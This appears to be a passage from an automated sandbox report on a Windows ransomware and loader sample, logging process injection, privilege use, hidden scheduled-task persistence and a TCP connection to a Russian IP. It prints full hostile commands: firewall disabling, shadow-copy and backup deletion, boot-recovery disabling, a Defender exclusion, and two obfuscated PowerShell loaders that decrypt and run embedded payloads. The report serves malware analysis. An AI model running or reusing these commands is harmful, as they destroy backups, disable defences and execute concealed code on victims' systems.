N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\wbengine.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2228 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2228 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 2176 wrote to memory of 4716 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
PID 4716 wrote to memory of 1856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 4716 wrote to memory of 1856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 4716 wrote to memory of 1856 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 4716 wrote to memory of 3420 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\s777mx.exe
PID 4716 wrote to memory of 3420 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\s777mx.exe
PID 4716 wrote to memory of 3420 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Users\Admin\AppData\Local\Temp\s777mx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 1856 wrote to memory of 3428 N/A C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe
PID 3292 wrote to memory of 2992 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe
PID 3292 wrote to memory of 2992 N/A N/A C:\Users\Admin\AppData\Local\Temp\3C2E.exe
PID 3292 wrote to memory of 3280 N/A N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe
PID 3292 wrote to memory of 3280 N/A N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe
PID 3292 wrote to memory of 3280 N/A N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe
PID 3292 wrote to memory of 4152 N/A N/A C:\Users\Admin\AppData\Local\Temp\42D7.exe
PID 3292 wrote to memory of 4152 N/A N/A C:\Users\Admin\AppData\Local\Temp\42D7.exe
PID 3292 wrote to memory of 4152 N/A N/A C:\Users\Admin\AppData\Local\Temp\42D7.exe
PID 3292 wrote to memory of 1424 N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe
PID 3292 wrote to memory of 1424 N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe
PID 3292 wrote to memory of 1424 N/A N/A C:\Users\Admin\AppData\Local\Temp\547C.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4248 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3280 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 4988 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3280 wrote to memory of 4980 N/A C:\Users\Admin\AppData\Local\Temp\3EBF.exe C:\Windows\system32\cmd.exe
PID 3292 wrote to memory of 1644 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 1644 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 1644 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4256 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4940 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 4980 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4980 wrote to memory of 1776 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 4988 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 4988 wrote to memory of 2860 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 4500 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3292 wrote to memory of 544 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 544 N/A N/A C:\Windows\explorer.exe
PID 3292 wrote to memory of 544 N/A N/A C:\Windows\explorer.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy service COM API

ransomware

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-922299981-3641064733-3870770889-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

C:\Windows\Microsoft.NET/Framework/v4.0.30319/aspnet_compiler.exe

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

"C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"

C:\Users\Admin\AppData\Local\Temp\s777mx.exe

"C:\Users\Admin\AppData\Local\Temp\s777mx.exe"

C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe

"C:\Users\Admin\AppData\Local\Temp\ldx999sx.exe"

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

C:\Users\Admin\AppData\Local\Temp\3C2E.exe

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

C:\Users\Admin\AppData\Local\Temp\42D7.exe

C:\Users\Admin\AppData\Local\Temp\42D7.exe

C:\Users\Admin\AppData\Local\Temp\3EBF.exe

"C:\Users\Admin\AppData\Local\Temp\3EBF.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 556 -ip 556

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 216

C:\Users\Admin\AppData\Local\Temp\547C.exe

C:\Users\Admin\AppData\Local\Temp\547C.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\vssadmin.exe

vssadmin delete shadows /all /quiet

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=disable

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet

C:\Windows\system32\wbengine.exe

"C:\Windows\system32\wbengine.exe"

C:\Windows\System32\vdsldr.exe

C:\Windows\System32\vdsldr.exe -Embedding

C:\Windows\System32\vds.exe

C:\Windows\System32\vds.exe

C:\Users\Admin\AppData\Local\Temp\547C.exe

"C:\Users\Admin\AppData\Local\Temp\547C.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\SRD.bat" "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sv.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\SRD.bat"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\sv.bat"

C:\Users\Admin\AppData\Local\Temp\sv.bat.exe

"C:\Users\Admin\AppData\Local\Temp\sv.bat.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);

C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe

"C:\Users\Admin\AppData\Local\Temp\SRD.bat.exe" -w hidden -c $RwDC='InVBDevokVBDeeVBDe'.Replace('VBDe', '');$IGVN='CreVBDeatVBDeeDecVBDeryptVBDeorVBDe'.Replace('VBDe', '');$qKLC='LoaVBDedVBDe'.Replace('VBDe', '');$fwfx='TVBDeranVBDesfVBDeorVBDemVBDeFinVBDeaVBDelVBDeBlVBDeocVBDekVBDe'.Replace('VBDe', '');$QupE='FrVBDeoVBDemBaVBDese6VBDe4StVBDeriVBDengVBDe'.Replace('VBDe', '');$GEjb='ChVBDeangVBDeeEVBDextVBDeenVBDesionVBDe'.Replace('VBDe', '');$XbqZ='ReaVBDedLiVBDenesVBDe'.Replace('VBDe', '');$dNNl='ElVBDeemeVBDentVBDeAtVBDe'.Replace('VBDe', '');$niMU='EVBDentVBDeryPVBDeoinVBDetVBDe'.Replace('VBDe', '');$CXFs='GetCVBDeurVBDereVBDenVBDetPVBDerocVBDeessVBDe'.Replace('VBDe', '');$tMEM='SplVBDeitVBDe'.Replace('VBDe', '');$yGFh='MaVBDeinVBDeModVBDeulVBDeeVBDe'.Replace('VBDe', '');function RcHQK($SJfnN){$ePbJG=[System.Security.Cryptography.Aes]::Create();$ePbJG.Mode=[System.Security.Cryptography.CipherMode]::CBC;$ePbJG.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$ePbJG.Key=[System.Convert]::$QupE('JDkzO6XH5gH021W2Y/ObVS2k+/ofiQdjxBF86RM/vL8=');$ePbJG.IV=[System.Convert]::$QupE('TPQFXcwHNdZ9KljZbDDnEA==');$uQtJU=$ePbJG.$IGVN();$QRiSY=$uQtJU.$fwfx($SJfnN,0,$SJfnN.Length);$uQtJU.Dispose();$ePbJG.Dispose();$QRiSY;}function nTqSF($SJfnN){$vKyUA=New-Object System.IO.MemoryStream(,$SJfnN);$flWoW=New-Object System.IO.MemoryStream;$gLlPI=New-Object System.IO.Compression.GZipStream($vKyUA,[IO.Compression.CompressionMode]::Decompress);$gLlPI.CopyTo($flWoW);$gLlPI.Dispose();$vKyUA.Dispose();$flWoW.Dispose();$flWoW.ToArray();}$fsXoM=[System.Linq.Enumerable]::$dNNl([System.IO.File]::$XbqZ([System.IO.Path]::$GEjb([System.Diagnostics.Process]::$CXFs().$yGFh.FileName, $null)), 1);$JMYTy=$fsXoM.Substring(2).$tMEM(':');$fhNaK=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[0])));$Prmhn=nTqSF (RcHQK ([Convert]::$QupE($JMYTy[1])));[System.Reflection.Assembly]::$qKLC([byte[]]$Prmhn).$niMU.$RwDC($null,$null);[System.Reflection.Assembly]::$qKLC([byte[]]$fhNaK).$niMU.$RwDC($null,$null);

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4152 -ip 4152

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4152 -s 428

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4112);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SRD')

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2024);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\sv')

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

C:\Users\Admin\AppData\Local\FallbackBuffer\iyvewvp\PublicKey.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TbvDl' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TbvDl.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TYjHE' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TYjHE.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

Network

Country Destination Domain Proto
US 8.8.8.8:53 14.103.197.20.in-addr.arpa udp
US 8.8.8.8:53 42.220.44.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 177.17.30.184.in-addr.arpa udp
RU 91.215.85.210:42902 91.215.85.210 tcp
